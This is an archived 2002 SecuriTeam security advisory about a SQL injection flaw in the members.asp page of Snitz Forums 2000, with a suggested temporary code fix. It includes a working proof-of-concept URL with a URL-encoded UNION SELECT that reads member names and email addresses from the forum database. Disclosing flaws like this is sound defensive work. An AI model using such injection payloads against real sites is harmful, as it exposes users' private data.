[NT] Snitz Forums 2000 Remote SQL Query Manipulation Vulnerability

From: support@securiteam.com
Date: 04/20/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Sat, 20 Apr 2002 18:23:49 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Snitz Forums 2000 Remote SQL Query Manipulation Vulnerability
------------------------------------------------------------------------

SUMMARY

 <http://forum.snitz.com/> Snitz Forums 2000 is open source ASP-based web
forum software. It runs on Microsoft Windows operating systems. A
vulnerability exists in Snitz Forums 2000 that makes it possible for a
malicious user to remotely manipulate the logic of SQL queries. As a
result, it may be possible for attackers to view all data in the forum's
database. This vulnerability can be exploited with a web browser.

DETAILS

Vulnerable systems:
Snitz Forums 2000 version 3.3 up to version 3.3.03

In the members.asp page, when listing the members with a certain criteria,
the input (M_NAME) is not checked for malicious code. As a result, an
attacker can add an extra SELECT statement to the query with a UNION
statement allowing him to view any data in the forum's database.

Proof-of-concept:
Normally, to view the members' list whose member name start with 'A',
members.asp page is used as the following:

/members.asp?mode=search&M_NAME=A&initial=1&method=

Using this link will exploit the vulnerability returning a list of other
users beside those who start with the letter XXXX:
/members.asp?mode=search&M_NAME=XXXX%
25')%20UNION%20SELECT%20MEMBER_ID,%
20M_STATUS,%20M_NAME%20%2B%20'/'%20%
2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,%
20M_EMAIL,%20M_COUNTRY,%
20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%
20M_AIM,%20M_TITLE,%20M_POSTS,%
20M_LASTPOSTDATE,%20M_LASTHEREDATE,%
20M_DATE,%20M_STATE%20FROM%
20FORUM_MEMBERS%20WHERE%20(M_NAME%
20LIKE%20'&initial=1&method=

Temporary fix:
To fix this bug, in members.asp, change the following lines:

SearchName = Request("M_NAME")
if SearchName = "" then
SearchName = Request.Form("M_NAME")
end if

With :

if IsValidString(Request("M_NAME")) then
SearchName = Request("M_NAME")
end if

if SearchName = "" then
if IsValidString(Request.Form("M_NAME")) then
SearchName = Request.Form("M_NAME")
end if
end if

And in function IsValidString(sValidate) in inc_functions.asp, change the
following line:

sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<"
With:
sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<'"

ADDITIONAL INFORMATION

The information has been provided by <mailto:acemi_5@yahoo.com> acemi.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.